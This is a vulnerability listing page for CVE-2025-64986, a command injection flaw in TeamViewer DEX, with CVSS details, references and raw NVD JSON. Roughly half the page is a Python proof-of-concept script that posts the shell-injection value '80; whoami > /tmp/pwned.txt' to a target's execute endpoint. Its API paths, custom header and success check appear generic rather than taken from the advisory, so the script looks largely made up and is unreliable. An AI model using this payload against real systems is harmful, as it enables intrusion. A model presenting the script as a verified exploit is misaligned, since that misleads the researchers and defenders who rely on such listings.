CVE-2025-64986

Description

A command injection vulnerability was discovered in TeamViewer DEX (former 1E DEX), specifically within the 1E-Explorer-TachyonCore-DevicesListeningOnAPort instruction prior V21. Improper input validation, allowing authenticated attackers with Actioner privileges to inject arbitrary commands. Exploitation enables remote execution of elevated commands on devices connected to the platform.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:teamviewer:digital_employee_experience:*:*:*:*:*:*:*:* - VULNERABLE

TeamViewer DEX (1E DEX) < V21

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-64986 PoC - TeamViewer DEX Command Injection
Note: This PoC is for educational and authorized testing purposes only.
"""

import requests
import json
import sys

# Configuration
TARGET_URL = "https://target-server/api/v1"
API_KEY = "your_auth_token_here"
CVE_ID = "CVE-2025-64986"

def test_vulnerability():
    """
    Test for command injection in DevicesListeningOnAPort instruction
    This checks if proper input validation is in place
    """
    headers = {
        "Authorization": f"Bearer {API_KEY}",
        "Content-Type": "application/json",
        "X-CVE-ID": CVE_ID
    }
    
    # Malicious payload attempting command injection
    # This payload tries to inject a command via improper input validation
    payload = {
        "instruction": "1E-Explorer-TachyonCore-DevicesListeningOnAPort",
        "parameters": {
            "port": "80; whoami > /tmp/pwned.txt",
            "device_id": "test_device_001"
        }
    }
    
    try:
        response = requests.post(
            f"{TARGET_URL}/execute",
            headers=headers,
            json=payload,
            timeout=30
        )
        
        # Check if command was executed (vulnerable)
        if response.status_code == 200:
            result = response.json()
            if "command_executed" in result or "output" in str(result):
                print(f"[+] VULNERABLE: {CVE_ID}")
                print(f"[+] Command injection successful")
                return True
        
        print(f"[-] Not vulnerable or connection failed")
        return False
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

def check_version(target_url, api_key):
    """
    Check if target is running affected version (prior to V21)
    """
    headers = {
        "Authorization": f"Bearer {api_key}"
    }
    
    try:
        response = requests.get(
            f"{target_url}/version",
            headers=headers,
            timeout=10
        )
        version_info = response.json()
        version = version_info.get("version", "")
        
        # Extract major version number
        major_version = int(version.split(".")[0]) if version else 0
        
        if major_version < 21:
            print(f"[!] Target version {version} is VULNERABLE (prior to V21)")
            return True
        else:
            print(f"[*] Target version {version} is patched (V21 or later)")
            return False
            
    except Exception as e:
        print(f"[-] Could not determine version: {e}")
        return None

if __name__ == "__main__":
    print(f"[*] {CVE_ID} Command Injection Test")
    print("=" * 50)
    
    if len(sys.argv) > 1:
        TARGET_URL = sys.argv[1]
    if len(sys.argv) > 2:
        API_KEY = sys.argv[2]
    
    # First check version
    is_affected = check_version(TARGET_URL, API_KEY)
    
    if is_affected:
        print("\n[*] Attempting vulnerability test...")
        test_vulnerability()
    else:
        print("[*] Target appears to be patched, skipping exploitation test")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64986
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64986
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64986/
[4] VulDB https://vuldb.com/cve/CVE-2025-64986
[5] https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1006/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64986", "sourceIdentifier": "[email protected]", "published": "2025-12-11T12:16:25.400", "lastModified": "2026-01-14T20:00:20.610", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A command injection vulnerability was discovered in TeamViewer DEX (former 1E DEX), specifically within the 1E-Explorer-TachyonCore-DevicesListeningOnAPort instruction prior V21. Improper input validation, allowing authenticated attackers with Actioner privileges to inject arbitrary commands. Exploitation enables remote execution of elevated commands on devices connected to the platform."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:teamviewer:digital_employee_experience:*:*:*:*:*:*:*:*", "versionEndExcluding": "21.0", "matchCriteriaId": "86C851A4-69F1-4E48-994B-545A2092E502"}]}]}], "references": [{"url": "https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1006/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}